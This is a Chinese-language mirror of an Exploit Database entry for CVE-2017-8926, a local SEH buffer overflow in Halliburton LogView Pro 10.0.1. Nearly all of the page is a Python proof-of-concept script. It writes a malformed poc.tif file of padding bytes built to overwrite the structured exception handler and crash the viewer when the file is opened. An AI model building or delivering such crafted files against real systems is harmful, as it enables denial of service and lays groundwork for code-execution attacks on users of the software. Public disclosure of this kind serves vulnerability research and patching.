Halliburton LogView Pro 10.0.1 – Local Buffer Overflow (SEH)

• Exploit Database
• 111 阅读

• 作者： Muhann4d
  日期： 2017-05-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/42001/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

  #!/usr/bin/python # Exploit Title : Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH) # Date: 2017-05-14 # Exploit Author: Muhann4d # CVE : CVE-2017-8926 # Vendor Homepage : http://www.halliburton.com # Software Link : http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe # Affected Versions : 10.0.1 # Category: Denial of Service (DoS) Local # Tested on OS: Windows 7 Professional SP1 32bit # Proof of Concept: run the exploit, open the poc.tif file with the Halliburton LogView Pro 10.0.1   # Vendor has been cantacted but no reply.   buf = "\x41" * 848 buff = "\x42" * 4 bufff = "\x43" * 4 buffff = "\x44" * 9999 f = open ("poc.tif", "w") f.write(buf + buff + bufff + buffff) f.close()